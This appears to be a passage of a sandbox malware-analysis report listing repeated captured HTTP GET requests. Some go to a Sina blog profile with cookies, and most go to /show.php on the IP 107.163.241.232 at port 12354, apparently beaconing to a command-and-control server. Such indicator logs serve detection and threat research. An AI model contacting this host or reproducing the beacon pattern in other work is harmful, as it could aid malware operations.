Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
